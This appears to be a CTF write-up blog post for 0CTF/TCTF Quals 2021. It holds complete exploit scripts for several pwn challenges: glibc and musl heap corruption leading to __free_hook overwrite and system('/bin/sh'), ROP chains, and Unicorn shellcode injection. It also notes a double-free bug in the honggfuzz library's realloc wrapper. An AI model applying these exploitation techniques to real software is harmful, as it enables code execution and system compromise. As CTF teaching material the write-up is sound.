0CTF/TCTF Quals 2021 Writeups

What is heap? I don't know.

Anyways I guess we're qualified to the Finals. I want to play it if I can play it onsite. Please open the border as soon as possible, Suga-san🙏🙏🙏🙏

[pwn 154pts] ListBook (61 solves)
[pwn 200pts] uc_masteeer (45 solves)
[pwn 550pts] uc_goood (10 solves)
[pwn 392pts] BabyHeap 2021 (18 solves)
[pwn 687pts] how2mutate (6 solves)
Other tasks I got involved in
- [misc 275pts] uc_baaaby (30 solves)
- [rev 550pts] FA51R_RE (10 solves)

The vulnerability is just a "-INT_MIN=INT_MIN" bug. It leads to double free or read after free. I don't understand the glibc memory allocator but something named smallbin worked for my exploit.

from ptrlib import *
import re

def add(name, data):
    assert len(name) <= 0x10 and len(data) <= 0x200
    sock.sendlineafter(">>", "1")
    if len(name) == 0x10:
        sock.sendafter("name>", name)
    else:
        sock.sendlineafter("name>", name)
    if len(data) == 0x200:
        sock.sendafter("content>", data)
    else:
        sock.sendlineafter("content>", data)

def delete(index):
    sock.sendlineafter(">>", "2")
    sock.sendlineafter("index>", str(index))

def show(index):
    sock.sendlineafter(">>", "3")
    sock.sendlineafter("index>", str(index))
    r = []
    while True:
        l = sock.recvline()
        if l == b'1.add': break
        if l == b'empty': break
        ll = re.findall(b"(.*) => (.*)", l)
        r.append(ll[0])
    return r

def calc_hash(s):
    if isinstance(s, str):
        s = str2bytes(s)
    v = sum([c for c in s])
    if v > 0x7f:
        v = (0xff ^ v) + 1
    return v % 16

libc = ELF("./libc-2.31.so")

sock = Socket("nc 111.186.58.249 20001")


add("A"*0x10, "A"*0x100)
add("B"*0x10, "B"*0x100)
heap_base = u64(show(calc_hash("A"*0x10))[0][0][0x10:]) - 0x2a0
logger.info("heap = " + hex(heap_base))
delete(calc_hash("A"*0x10))
delete(calc_hash("B"*0x10))


for i in range(7):
    add("\x01", "1"*0x100)
add("\x00", "0"*0x100)
add("\x02", "2"*0x100)
add("\x0f", "F"*0x100) 
delete(calc_hash("\x01"))
delete(calc_hash("\x02"))
delete(calc_hash("\x00"))
add("\x80", "Z") 
libc_base = u64(show(calc_hash("\x00"))[0][1]) - libc.main_arena() - 0x260
logger.info("libc = " + hex(libc_base))
libc.set_base(libc_base)


for i in range(0xa):
    add("\x03", "3"*0x100)
    delete(calc_hash("\x03"))


add("\x03", "3"*0x100)
delete(calc_hash("\x00"))

add("\x04", "4"*0x100)


for i in range(8):
    add("\x05", "5"*0x100) 
delete(calc_hash("\x05"))

delete(calc_hash("\x03"))  
for i in range(7):
    add("\x06", "6"*0x100) 
delete(calc_hash("\x04"))  


addr_payload = heap_base + 0x7a0
payload  = p64(0xdeadbeef) +  p64(addr_payload + 0x20)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload) + p64(addr_payload + 0x40)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0x20) + p64(addr_payload + 0x60)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0x40) + p64(addr_payload + 0x80)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0x60) + p64(addr_payload + 0xa0)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0x80) + p64(addr_payload + 0xc0)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0xa0) + p64(addr_payload + 0xe0)
payload += p64(0) + p64(0x211)
payload += p64(addr_payload + 0xc0) + p64(addr_payload + 0x100)
add("\x03", payload)


payload  = b'A' * 0xe0
payload += p64(libc.symbol("__free_hook") - 8)
add("\x07", payload)


add("\x07", "X")
add("\x0e", b"/bin/sh\0" + p64(libc.symbol("system")))
delete(calc_hash("\x0e"))

sock.interactive()

Unicorn pwn challenge. There's a simple backdoor that only the admin can use. The admin code calls a modifiable function pointer and you can just change it to take the control.

from ptrlib import *

code = nasm("""
mov rax, 0xdeadbeef000 ; ret2beef
mov rdi, 0xbabecafe000 ; [CODE]
mov [rdi], rax
""", bits=64)


sock = Socket("nc 111.186.59.29 10087")

sock.send(code)
sock.sendlineafter("?: ", "2")
sock.sendlineafter("(y/[n])", "y")
sock.sendlineafter("?: ", "1")


evil = nasm("""
mov edx, 0x40
mov rsi, 0xbabecafe300
xor edi, edi
xor eax, eax
syscall
mov rax, 0xbabecafe300
mov rdi, 0xbabecafe233
mov [rdi], rax
""", bits=64)
evil += b'\x90' * (0x80 - len(evil))

sock.sendlineafter("?: ", "3")
sock.sendafter("addr: ", p64(0xdeadbeef000 + 0x1000))
sock.sendafter("size: ", p64(0x80))
sock.sendafter("data: ", evil)


sock.sendlineafter("?: ", "3")
sock.sendafter("addr: ", p64(0xbabecafe000))
sock.sendafter("size: ", p64(8))
sock.sendafter("data: ", p64(0xdeadbeef000 + 0x1000))


cmd = "/bin/sh;"
sock.sendlineafter("?: ", "2")
sock.send("k33nlab" + cmd)

sock.interactive()

First blood.

The function pointer is no longer modifiable. The bug exists in the initialization code to hook the admin code.

uc.hook_add(UC_HOOK_CODE, admin_hook, None, admin_offset, admin_offset + 1)

This code hooks the instruction not only at admin_offset but also at admin_offset+1. The instruction at admin_offset+1 interprets to the following machine code:

 deadbeef067:   12 00                   adc    al, BYTE PTR [rax]
 deadbeef069:   00 00                   add    BYTE PTR [rax], al
 deadbeef06b:   48 8d 15 35 01 00 00    lea    rdx, [rip+0x135]        # 0xdeadbeef1a7
 deadbeef072:   be 01 00 00 00          mov    esi, 0x1
...

add BYTE PTR [rax], al looks good because it corrupts a byte in the memory. My first goal was to directly corrupt the following instruction without crash so that the backdoor won't be executed:

 deadbef0028:   48 a3 33 e2 af ec ab    movabs ds:0xbabecafe233, rax

Because of the adc al, BYTE PTR [rax] instruction, however, I couldn't find any address that corrupts the target directly.

After some attempts, I found setting rax to 0xdeadbef0028 corrupts a byte in the syscall function.

 deadbef0043:   48 89 f8                mov    rax, rdi
 deadbef0046:   48 89 f7                mov    rdi, rsi
 deadbef0049:   48 89 d6                mov    rsi, rdx
 deadbef004c:   48 89 ca                mov    rdx, rcx
 deadbef004f:   4d 89 c2                mov    r10, r8
 deadbef0052:   4d 89 59 4c             mov    QWORD PTR [r9+0x4c], r11
 deadbef0056:   8b 4c 24 08             mov    ecx, DWORD PTR [rsp+0x8]
 deadbef005a:   0f 05                   syscall 
 deadbef005c:   c3                      ret

mov QWORD PTR [r9+0x4c], r11 is a good AAW primitive. Since both r9 and r11 are not used in the admin code, we can take advantage of this primitive to corrupt the backdoor routine.

from ptrlib import *

code = nasm("""
mov r9, 0xdeadbef002a - 0x4c
mov r11, 0xbabecafe000
push r9
push r9
push r9
push r9
; generate
;  mov QWORD [r9+0x4c], r11
;  mov ecx, DWORD [rsp+8]
mov rax, 0xdeadbef009d
mov rdi, 0xdeadbeef067
jmp rdi
""", bits=64, org=0)
if code is None:
    exit(1)


sock = Socket("nc 111.186.59.29 10088")


sock.send(code)
sock.sendlineafter("?: ", "2")

sock.sendlineafter("(y/[n])", "y")


code = nasm("""
lea rsi, [rel cmd]
mov rdi, 0xbabecafe233
mov QWORD [rdi], rsi
hlt
cmd:
db "k33nlab/bin/sh", 0
""", bits=64)
sock.sendlineafter("?: ", "3")
sock.sendafter("addr: ", p64(0xdeadbef0000))
sock.sendafter("size: ", p64(len(code)))
sock.sendafter("data: ", code)


sock.sendlineafter("?: ", "2")

sock.interactive()

Integer overflow (?) in the update function. It checks if the size is negative in int64_t but the data reader checks the maximum size in int32_t. Finally the reader function iterates the loop by uint32_t. It's obviously vulnerable to heap overflow.

I don't understand musl memory allocator as well as glibc malloc but I could overwrite a vtable pointer just by abusing the unlink thing. We need to do ROP because of seccomp. This is not a problem at all because we have enough JOP gadgets in the musl library.

from ptrlib import *

def allocate(size, data):
    assert len(data) < size
    sock.sendlineafter(": ", "1")
    sock.sendlineafter(": ", str(size))
    if size == len(data) + 1:
        sock.sendafter(": ", data)
    else:
        sock.sendlineafter(": ", data)

def update(index, size, data):
    assert len(data) < size
    sock.sendlineafter(": ", "2")
    sock.sendlineafter(": ", str(index))
    sock.sendlineafter(": ", str(size))
    if size == len(data) + 1:
        sock.sendafter(": ", data)
    else:
        sock.sendlineafter(": ", data)

def delete(index):
    sock.sendlineafter(": ", "3")
    sock.sendlineafter(": ", str(index))

def view(index):
    sock.sendlineafter(": ", "4")
    sock.sendlineafter(": ", str(index))
    return sock.recvlineafter(": ")


sock = Socket("111.186.59.11", 11124)


allocate(0x10, "A") 
allocate(0x10, "B") 
allocate(0x30, "C") 
allocate(0x10, "D") 
allocate(0x30, "E") 
allocate(0x10, "F") 
payload  = b'A' * 0x10
payload += p64(0x21) + p64(0x41)
payload += b'B' * 0x10
payload += p64(0x21) + p64(0x41)
payload += b'C' * 0x10
payload += p64(0x41) + p64(0x21)
update(0, 0xffffffff, payload[:-1])
delete(1)
payload  = b'B' * 0x10
payload += p64(0x21) + p64(0x41)
payload += b'C' * 0xf
allocate(0x30, payload) 
delete(2)
delete(4)
addr_heap = u64(view(1)[0x20:0x28]) - 0xb0
libc_base = u64(view(1)[0x28:0x30]) - 0xb0a58
logger.info("heap = " + hex(addr_heap))
logger.info("libc = " + hex(libc_base))
delete(5)
allocate(0x30, "C")     


rop_mov_rsp_rdx_mov_rdx_prdi38h_jmp_rdx = libc_base + 0x00078d28
rop_ret = libc_base + 0x00015292
addr_vtable = libc_base + 0xb2f58
allocate(0x10, "4"*8) 
allocate(0x10, "5"*8) 
allocate(0x30, "6"*8) 
allocate(0x10, "7"*8) 
addr_payload = addr_heap + 0x160
payload  = b'./flag\0'
payload += b"A" * (0x38 - len(payload))
payload += p64(rop_ret)
payload += b"A" * (0x50 - len(payload))
payload += p64(rop_mov_rsp_rdx_mov_rdx_prdi38h_jmp_rdx) 
payload += b"A" * 0xf8
payload += p64(addr_payload) 
allocate(0x200, payload)
delete(4)
delete(6)
payload  = b'5'*0x10
payload += p64(0x21) + p64(0x40)
payload += p64(addr_vtable - 0x18)
update(5, 0xffffffff, payload[:-1])
allocate(0x30, "X") 


rop_pop_rdi = libc_base + 0x00015291
rop_pop_rsi = libc_base + 0x0001d829
rop_pop_rdx = libc_base + 0x0002cdda
rop_pop_rax = libc_base + 0x00016a16
rop_xchg_eax_edi = libc_base + 0x000303ed
rop_syscall = libc_base + 0x00023720
payload  = b'D' * 0x10
payload += flat([
    rop_pop_rdi, addr_payload,
    rop_pop_rsi, 0,
    rop_pop_rax, SYS_open['x64'],
    rop_syscall, 
    rop_xchg_eax_edi,
    rop_pop_rsi, addr_heap,
    rop_pop_rdx, 0x100,
    rop_pop_rax, SYS_read['x64'],
    rop_syscall, 
    rop_pop_rdi, 1,
    rop_pop_rax, SYS_write['x64'],
    rop_syscall, 
], map=p64)
update(3, 0xffffffff, payload[:-1])

sock.sendlineafter(": ", "5")

sock.interactive()

First blood!

The program uses honggfuzz library by Google.

One clear bug is the race condition in the program. The fuzzing runs in a thread while we can nullify some pointers used by the thread, which causes null pointer dereference. I don't think it's exploitable.

The another vulnerability exists in the memory allocation utility in the library.

void* util_Realloc(void* ptr, size_t sz) {
    void* ret = realloc(ptr, sz);
    if (ret == NULL) {
        PLOG_W("realloc(%p, %zu)", ptr, sz);
        free(ptr);
        return NULL;
    }
    return ret;
}

It's obvious double free happens whenever sz is zero. This might sound like a little 0-day but actually I guess the author assumes sz will never be zero by specification. (Although I couldn't find any documents stating sz can never be zero, it's natural to assume such constraints in the context of mutation.) The honggfuzz developers are not to blame. This is absolutely because of the sh*tty design of glibc realloc. Why the hell are we responsible for checking the size and otherwise generates a bug this easy?

Double free is always detected in glibc and this doesn't look useful. However, the logger function (PLOG_W) allocates/frees some data inside it. If we prepare the initial tcache state properly, it somehow links one into smallbin and another into tcache. It depends on the locale of the machine running the program, so I checked how many chunks go into tcache on remote by some exception-based observation.

Again I'm not familiar with glibc malloc and I don't know what I did. It looks like I used the same technique as the one I used in ListBook. (I just usually use gdb to bypass the "security lol" mitigations. No more House of Sh*t.)

from ptrlib import *
import random

def add(size, data=None):
    sock.sendlineafter("> ", "1")
    sock.sendlineafter(": ", str(size))
    if data:
        sock.sendafter(": ", data)
def mutate(index):
    sock.sendlineafter("> ", "2")
    sock.sendlineafter(": ", str(index))
def show():
    sock.sendlineafter("> ", "3")
def delete(index):
    sock.sendlineafter("> ", "4")
    sock.sendlineafter(": ", str(index))
def set_mutate(mpr):
    sock.sendlineafter("> ", "5")
    sock.sendlineafter(": ", str(mpr))
def run_thread():
    sock.sendlineafter("> ", "6")

DEBUG = False


COUNT = 7 

libc = ELF("/lib/x86_64-linux-gnu/libc-2.31.so")


sock = Socket("nc 111.186.59.27 12345")



logger.info("Heap Feng Shui 1")
for i in range(7):
    add(0x90, "A")
logger.info("Heap Feng Shui 1.5")
for i in range(7):
    delete(i)
logger.info("Heap Feng Shui 2")
for i in range(7):
    add(0xc0, "B")
logger.info("Heap Feng Shui 2.5")
for i in range(7):
    delete(i)


logger.info("Triggering double free...")
set_mutate(0) 
add(0) 
logger.info("Heap Feng Shui 3")
for i in range(7):
    add(0x10, "AAAAAAAA") 
logger.info("Heap Feng Shui 3.5")
for i in range(1, 8):
    delete(i)
mutate(0) 
set_mutate(1)


add(0x820, "YYYY") 
add(0x20, "YYYY") 
delete(0)
delete(1)


logger.info("Leaking libc")
logger.info("Heap Feng Shui 4")
for i in range(8):
    add(0x97, "A"*0x97) 
logger.info("Heap Feng Shui 4.5")
for i in range(8):
    delete(i)
while True:
    logger.info("May the odds be ever in your favor")
    add(0xa0-1, "A" * 0x9f) 
    mutate(0)
    show()
    leak = sock.recvline()[3:]
    if len(leak) > 0xa0:
        print(leak[0xa0:])
        libc_base = (u64(leak[0xa0:]) & 0xfffffffffffff000) - 0x1eb000
        break
    delete(0)
delete(0)
logger.info("libc = " + hex(libc_base))
if DEBUG:
    libc_base = 0x7ffff7ad2000 
if not (0x700000000000 < libc_base < 0x7fffffffffff):
    logger.warning("Bad luck!")
    exit(1)


logger.info("Heap Feng Shui 5")
add(0xc7, "A"*0xc7) 
add(0xc7, "B"*0xc7) 
add(0xc7, "C"*0xc7) 
add(0xc7, "D"*0xc7) 
for i in range(4, 10):
    add(0xc7, "A"*0xc7) 
logger.info("Heap Feng Shui 5.5")
delete(0)
for i in range(4, 10):
    delete(i)
delete(3)
delete(1)
delete(2)
while True:
    logger.info("May the odds be ever in your favor")
    add(0x1a0-1, "Z"*0x19f) 
    mutate(0)
    show()
    leak = sock.recvline()[3:]
    if len(leak) > 0x1a0:
        print(leak[0x1a0:])
        addr_heap = (u64(leak[0x1a0:]) & 0xfffffffffffff000)
        break
    delete(0)
delete(0)
if addr_heap & 0xf000 == 0xa000:
    addr_heap -= 0x1000
logger.info("heap = " + hex(addr_heap))
if DEBUG:
    addr_heap = 0x555555b69000 
if not (0x500000000000 < addr_heap < 0x5fffffffffff):
    logger.warning("Bad luck!")
    exit(1)


logger.info("Smallbin attack...")
addr_payload = addr_heap - 0x150
payload  = p64(0xcafe) + p64(0x21)
payload += p64(addr_heap - 0x260) + p64(addr_payload + 0x20)
payload += p64(0xcafe) + p64(0x21)
payload += p64(addr_payload + 0x20) + p64(addr_payload + 0x40)
payload += p64(0xcafe) + p64(0x21)
payload += p64(addr_payload + 0x40) + p64(addr_payload + 0x60)
payload += p64(0xcafe) + p64(0x21)
payload += p64(addr_payload + 0x60) + p64(addr_payload + 0x80)
payload += p64(0xcafe) + p64(0x21)
payload += p64(addr_payload + 0x80) + p64(addr_payload + 0xa0)
payload += p64(0xcafe) + p64(0x21)
payload += p64(addr_payload + 0xa0) + p64(addr_heap - 0xc70)
add(0x1d0, payload) 


add(0x10, p64(libc_base + 0x1ebbf0) + p64(addr_payload)) 


counter = 1
for i in range(COUNT):
    add(0x10, "legoshi") 
    counter += 1


add(0x10, "legoshi") 
delete(0)


logger.info("Tcache corruption...")
add(0x10, p64(libc_base + libc.symbol("__free_hook"))) 
for i in range(1, 3):
    delete(i) 
add(0x90, "/bin/sh\0") 
add(0x90, p64(libc_base + libc.symbol("system"))) 


delete(1)

sock.interactive()

Second blood.

[misc 275pts] uc_baaaby (30 solves)

nyanko先生 wrote the MD5 algorithm part. Another obstacle of this task is that we have to reach the end of the program within hundreds of executions without any branch instructions.

A machine code of x86/x64, by specification, can be infinitely long by adding the prefix. Too long instruction (15-byte afair) is usually killed by the CPU but unicorn doesn't check the length. So, we can make one instruction super long. For example,

data16 data16 ...<100 times>... data16 data16 mov bp, sp

is ONE instruction but the length is more than 100 bytes.

[rev 550pts] FA51R_RE (10 solves)

x0r19x91師匠 precisely reverse engineered the binary. I converted it into Python and tried finding the solution.

I'm really bad at algorithm and I had no idea how to solve it. I barely have learned game AI programming before and could write the following heuristic function.

def score(a, b):
    v = a | b
    r = 0
    if a & b == 0:
        r += 8
    if a & b == b and score(0, a) != 0:
        r += 8
    if v == 0x1111: r += 100
    if v & 0x1111 == 0x1111: r += 1
    if v == 0x2222: r += 100
    if v & 0x2222 == 0x2222: r += 1
    if v == 0x4444: r += 100
    if v & 0x4444 == 0x4444: r += 1
    if v == 0x8888: r += 100
    if v & 0x8888 == 0x8888: r += 1
    if v == 0x000f: r += 100
    if v & 0x000f == 0x000f: r += 1
    if v == 0x00f0: r += 100
    if v & 0x00f0 == 0x00f0: r += 1
    if v == 0x0f00: r += 100
    if v & 0x0f00 == 0x0f00: r += 1
    if v == 0xf000: r += 100
    if v & 0xf000 == 0xf000: r += 1
    return r

def find_best_move_one(correct, w):
    x, y, z = 0, 0, w
    best_score = score(correct, w)
    for i in range(4):
        w = rotl16(w, 4)
        for j in range(4):
            w = magic_2(w)
            r = score(correct, w)
            if r > best_score:
                best_score = r
                x, y, z = (i+1)%4, (j+1)%4, correct | w
    v = ([0,1,3,7][x] << 4) | [0,1,3,7][y]
    if v == 0:
        v == 0xff
    return v, z

def find_best_move(w):
    for i in range(1, 6):
        if g_Masks[i] == 0: continue
        return find_best_move_one(g_Masks[i], w)
    return find_best_move_one(g_Masks[5], w)

Fortunately this shitty code I wrote, right after I woke up and 2h before the end of the CTF, sometimes worked (in less than 10% possibility).

After the competition ends, I read the source code in the official repository and it turned out the program was actually Tetris.